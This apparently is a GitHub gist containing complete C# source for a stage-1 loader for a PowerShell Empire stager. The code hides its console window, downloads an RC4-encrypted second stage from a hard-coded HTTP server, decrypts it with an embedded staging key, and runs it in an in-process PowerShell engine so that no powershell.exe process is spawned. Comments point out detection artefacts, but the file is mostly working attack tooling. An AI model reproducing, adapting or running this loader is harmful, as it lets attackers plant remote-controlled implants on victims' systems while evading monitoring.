@chr0n1k
Created October 13, 2020 14:04
A C# implementation of a loader to execute an Empire stager
// csc.exe empire.cs /reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System;
using System.Collections.Generic;
using System.Linq;
using System.Management.Automation;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace PSEmpire_Stage1
{
/// <summary>
/// Stage-1 loader for a PowerShell Empire stager. It hides its console window, fetches an
/// RC4-obscured stage-2 blob over plain HTTP, rebuilds the RC4 key from the 4-byte prefix of
/// the response plus a staging key embedded in this binary, decrypts, and executes the result
/// as a PowerShell script inside an in-process System.Management.Automation engine
/// (no powershell.exe is spawned).
/// </summary>
class Program
{
// RC4 Class to decrypt the stage 2 data
// Created by Jeong ChangWook. Source https://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4
/// <summary>
/// Textbook RC4 stream cipher. RC4 is cryptographically broken and offers no integrity
/// protection; in this file it only obscures the stage-2 payload, since the key material
/// (staging key in <see cref="Main"/>) ships inside the binary.
/// </summary>
public class RC4
{
/// <summary>
/// RC4-encrypts <paramref name="data"/>; because RC4 XORs a keystream, the same call decrypts.
/// </summary>
/// <param name="pwd">Key bytes, reused cyclically to fill the 256-entry key schedule.</param>
/// <param name="data">Input bytes; not modified.</param>
/// <returns>A newly allocated array, same length as <paramref name="data"/>, holding the XORed bytes.</returns>
/// <exception cref="DivideByZeroException">An empty <paramref name="pwd"/> (the <c>i % pwd.Length</c> in the key-expansion loop).</exception>
/// <exception cref="NullReferenceException">A null argument; there is no argument validation.</exception>
public static byte[] Encrypt(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
// Key-scheduling (KSA), step 1: expand the key cyclically and start from the identity permutation.
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
// KSA, step 2: scramble the permutation with the expanded key.
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
// Pseudo-random generation (PRGA): one keystream byte k per input byte, XORed into cipher.
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
/// <summary>
/// Decrypts <paramref name="data"/>. Identical to <see cref="Encrypt"/>: RC4 is symmetric.
/// </summary>
/// <param name="pwd">Key bytes.</param>
/// <param name="data">Ciphertext bytes.</param>
/// <returns>The keystream-XORed bytes.</returns>
public static byte[] Decrypt(byte[] pwd, byte[] data)
{
return Encrypt(pwd, data);
}
}
// Hide Windows function by our friends from StackOverFlow
// https://stackoverflow.com/questions/34440916/hide-the-console-window-from-a-console-application
/// <summary>Win32: returns the window handle of the console attached to this process.</summary>
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
/// <summary>Win32: sets a window's show state; <paramref name="nCmdShow"/> 0 is SW_HIDE.</summary>
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
/// <summary>
/// Entry point. There is no error handling anywhere in this method: a network failure,
/// a short response, a decode problem or a script error surfaces as an unhandled exception.
/// </summary>
/// <param name="args">Unused.</param>
static void Main(string[] args)
{
// To Hide the ConsoleWindow (It may be a better way...)
// Only the window is hidden; the process itself remains visible to process listings.
// ShowWindow's return value is ignored.
var handle = GetConsoleWindow();
ShowWindow(handle, 0);
// Avoid sending Expect 100 Header
System.Net.ServicePointManager.Expect100Continue = false;
// Create a WebClient Object (No Proxy Support Included)
// Fixed User-Agent and Cookie header values: together with the cleartext URL below these
// are stable, static strings a network sensor or a YARA-style rule can match on.
WebClient wc = new WebClient();
string ua = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
wc.Headers["User-Agent"] = ua;
wc.Headers["Cookie"] = "DtMtDDhynCf=UXhs4XZoDVgeYUUqjCOmMWILVOk=";
// Set the Server Address and URL
// Hard-coded cleartext HTTP endpoint: no TLS and no integrity check on the response, so
// anything on the network path can observe or substitute the stage.
string server = "http://10.101.105.69:80";
string target = "/login/process.php";
// Download The Data or Stage 2
// Synchronous download, no explicit timeout, no size limit, whole body buffered in memory.
byte[] data = wc.DownloadData(server + target);
// Extract IV
// First 4 bytes of the response are the per-request IV. Select(i => i) is an identity no-op.
// Nothing checks that at least 4 bytes arrived; a shorter response yields a short iv and an empty data_noIV.
byte[] iv = data.Take(4).Select(i => i).ToArray();
// Remove the IV from the data
byte[] data_noIV = data.Skip(4).ToArray();
// Set Key value for decryption. PowerEmpire StageingKey value
// Staging key embedded in the binary as an ASCII literal: anyone holding this file (or the
// source) can decrypt a captured stage-2 download offline.
string key = "0cb1670e6af5c5a08f74e922189da53a";
byte[] K = Encoding.ASCII.GetBytes(key);
// Combine the IV + Key (New random key each time)
// Effective RC4 key is IV || stagingKey; only the 4-byte IV portion can vary between downloads.
byte[] IVK = new byte[iv.Length + K.Length];
iv.CopyTo(IVK, 0);
K.CopyTo(IVK, iv.Length);
// Decrypt the Message
byte[] decrypted = RC4.Decrypt(IVK, data_noIV);
// Convert the stage2 decrypted message from bytes to ASCII
// ASCII decoding replaces any byte >= 0x80 with '?', so a wrong key or corrupted stage produces
// a garbled script rather than an error at this point.
string stage2 = System.Text.Encoding.ASCII.GetString(decrypted);
// Create a PowerShell Object to execute the command
// Hosts the PowerShell engine inside this process instead of spawning powershell.exe, so
// process-creation monitoring keyed on powershell.exe does not see it; the load of
// System.Management.Automation.dll into an unexpected host process is the observable event.
// The script still runs through the engine, so script block logging / AMSI apply as they
// would for powershell.exe on engines that implement them (the referenced assembly version
// does not pin which engine is present — confirm per host).
// The PowerShell instance is IDisposable and is never disposed.
PowerShell PowerShellInstance = PowerShell.Create();
// Create the variables $ser and $u which are part of the downloaded stage2
// Exposes the server URL and the User-Agent string to the stage-2 script as $ser and $u.
PowerShellInstance.Runspace.SessionStateProxy.SetVariable("ser", server);
PowerShellInstance.Runspace.SessionStateProxy.SetVariable("u", ua);
// Add the Script Stage 2 to the Powershell Object
PowerShellInstance.AddScript(stage2);
// Execute the Script!
// Blocking invoke; the script's output and error streams are discarded, and engine
// exceptions propagate out of Main unhandled.
PowerShellInstance.Invoke();
}
}
}